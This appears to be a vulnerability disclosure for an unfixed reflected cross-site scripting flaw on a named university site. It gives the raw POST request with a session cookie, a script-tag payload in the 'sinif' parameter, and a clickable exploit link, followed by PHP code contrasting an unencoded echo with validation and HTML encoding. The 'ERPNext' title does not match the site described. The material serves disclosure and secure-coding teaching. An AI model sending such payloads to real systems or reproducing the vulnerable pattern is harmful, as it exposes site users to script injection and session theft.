Name: http://bys.comu.edu.tr/ Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: http://bys.comu.edu.tr/
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: Not fixed
----------------------------------------------------------------------------------------------------------------------------------------------
Request Headers
POST /cdsp/raporlar/rapor_hftdrsprg.php HTTP/1.1
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b74d51311432faca30c286e8b1f623d7; ets_ci_sessions=B2cCbgQ3CTUGLwIjUzoJOQE1UTkEc1VyVzRfdFQlBzhSbVM0AVoFbw9qVyNWagVwAWlXNgBhADsGIFIzVjAGYAptATwDMgZnUDNUOFBiDTgHMgJtBDoJOQZgAmdTMwlpATRRZwRoVWVXZ18%2FVGIHaFJnU2MBPAUyD29XI1ZqBXABaVc0AGMAOwYgUmlWcwYNCm0BPQNlBiJQZVQuUCcNLAc9AicEOQk%2BBmYCalMiCTwBM1EtBGBVL1dgXzBUZwd%2FUjNTbgEzBSQPNVdyVmsFMgFjVz8AcQB0BnFSZVZxBg0KbQE%2BA2QGPlB0VH9Qbw19BzwCYQQzCTUGdgIdU28JcgFsUW8EPVVgV35fMlR4B2FSIlNyAWYFaQ9jV3FWMAV3ATpXZwA%2FAGQGOVIgVk4GAQpFARwDIQZpUC5UbVBvDS4HUQI9BG0JawY7AidTcwkoAUtRVwRxVTdXf182VG0Hc1I5UykBPwU3Dz1XO1ZzBW8BMld2ACcAXgZjUmNWdwY7CnoBMAN1BilQIlRmUCcNNAc3AmQEOQktBmUCZVM3CTABMVE7BGlVNVdmXzBUdAdqUn8%3D
Host: bys.comu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
---------------------------------------------------------------------------------------------------------------------------------------------
Request body (the alert payload is carried in the `sinif` parameter):
bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E
----------------------------------------------------------------------------------------------------------------------------------------------
Full link (same parameters as a GET request):
http://bys.comu.edu.tr//cdsp/raporlar/rapor_hftdrsprg.php?bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E
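The server-side source of rapor_hftdrsprg.php is not on the page, so the following is an added illustration, not the site's code: it assumes the report echoes `sinif` into the HTML unencoded, and shows that pattern next to a hardened handler that validates the value as a class number and HTML-encodes it on output. The parameter names come from the advisory's request body; `h()`, `renderVulnerable()` and `renderHardened()` are hypothetical names.

```php
<?php
// Added example, not the bys.comu.edu.tr code. The real handler is unknown;
// the reflection in renderVulnerable() is an assumption that reproduces the
// symptom the advisory reports.
declare(strict_types=1);

// Vulnerable pattern: the raw parameter is concatenated into the page, so a
// value containing <script> becomes a live element in the visitor's browser.
function renderVulnerable(array $params): string
{
    $sinif = $params['sinif'] ?? '';
    return '<h2>Sinif: ' . $sinif . '</h2>';
}

// Output encoder for the HTML text/attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: validate against what a class number can legitimately be
// (assumed here to be 1..8), reject anything else without echoing it back,
// and still encode on output as defence in depth.
function renderHardened(array $params): string
{
    $sinif = filter_var($params['sinif'] ?? '', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 8],
    ]);
    if ($sinif === false) {
        http_response_code(400);
        return '<p>' . h('Invalid class value.') . '</p>';
    }
    return '<h2>Sinif: ' . h((string) $sinif) . '</h2>';
}

// Constructed input: the URL-encoded body from the advisory's POST request.
parse_str(
    'bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E',
    $params
);

echo renderVulnerable($params), PHP_EOL; // emits an unencoded <script> element
echo renderHardened($params), PHP_EOL;   // rejects the value with a 400 response
echo renderHardened(['sinif' => '3']), PHP_EOL; // valid input renders normally
```

Free-text parameters that cannot be validated as tightly as `sinif` must still pass through `h()` before reaching the page; the encoding step, not the integer check, is what neutralises the reflected markup.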